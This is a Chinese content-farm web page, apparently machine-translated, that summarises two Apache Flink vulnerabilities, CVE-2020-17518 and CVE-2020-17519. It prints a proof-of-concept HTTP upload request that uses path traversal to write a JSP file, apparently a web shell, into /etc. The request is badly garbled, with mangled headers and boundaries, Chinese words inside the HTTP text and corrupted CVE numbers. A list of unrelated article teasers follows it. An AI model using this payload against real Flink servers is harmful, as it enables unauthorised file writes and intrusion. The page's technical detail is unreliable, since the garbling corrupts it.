Apache Flink POC漏洞示例分析CVE-2020-17518/17519

技术Apache Flink POC漏洞CVE-2020-17518/17519的示例分析今天就跟大家聊聊有关 Apache Flink POC漏洞CVE-2020-17518/17519的示例分析,可能很多人都不太了解

今天跟大家聊聊Apache Flink POC漏洞CVE-2020-17518/17519的实例分析,可能很多人不太了解。为了让大家更好的了解,边肖为大家总结了以下内容,希望大家能从这篇文章中有所收获。

CVE-2020-175183360文件写入

使用REST API,攻击者可以修改HTTP头并将上传的文件写入本地文件系统的任何位置(Flink 1.5.1进程可以访问)

CVE-2020-175193360文件读取

Apache Flink 1.11.0允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件(可由JobManager进程访问)。

概念验证:

POST/jars/upload HTTP/1.1host : IP :8081 Accept-encoging : gzip,pinaceaccept : */* Accept-language : enUser-agent : Mozilla/5.0(Windows NT 10.0;Win64x64)applebwebkit/537.36(KHTML,像Gecko)Chrome/87 . 0 . 4280 . 88 Safari/537.36 connection : closeContent-type : multipart/form-data;boundary=-webkitformboundaryoz89r 6 ycontent-length : 189-webkitformboundaryoz8mknrrs89r 6 ycontent-disposition :表单-数据;name=’ jarfile文件名=’././././././etc/shell . JSP ‘ success-webkitformboundaryoz8 meknrso 89 r6y-

看完以上内容,你对Apache Flink POC漏洞CVE-2020-17518/17519的样本分析有更好的理解吗?如果您想了解更多知识或相关内容,请关注行业资讯频道,感谢您的支持。

内容来源网络,如有侵权,联系删除,本文地址:https://www.230890.com/zhan/155656.html

(0)

相关推荐

  • postgresql中如何实现group by range

    技术postgresql中如何实现group by range小编给大家分享一下postgresql中如何实现group by range,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文

    攻略 2021年11月25日
  • apacheflink多个漏洞分析(apacheflink目录遍历漏洞修复)

    技术Apache Flink 目录遍历漏洞是怎样的本篇文章给大家分享的是有关Apache Flink 目录遍历漏洞是怎样的,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一

    攻略 2021年12月21日
  • VS如何部署代码同步信息

    技术VS如何部署代码同步信息这篇文章主要为大家展示了“VS如何部署代码同步信息”,内容简而易懂,条理清晰,希望能够帮助大家解决疑惑,下面让小编带领大家一起研究并学习一下“VS如何部署代码同步信息”这篇文章吧。使分布式系统

    攻略 2021年12月1日
  • JavaScript中函数调用栈是怎么工作的

    技术JavaScript中函数调用栈是怎么工作的这篇文章将为大家详细讲解有关JavaScript中函数调用栈是怎么工作的,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。合理地处理堆栈信息

    攻略 2021年11月6日
  • django认证类配置实现方法是什么

    技术django认证类配置实现方法是什么这篇文章主要介绍“django认证类配置实现方法是什么”,在日常操作中,相信很多人在django认证类配置实现方法是什么问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法

    攻略 2021年11月10日
  • chrome在野外利用0day漏洞的实例分析

    技术chrome在野利用0day漏洞的示例分析今天就跟大家聊聊有关chrome在野利用0day漏洞的示例分析,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。0x00

    攻略 2021年12月22日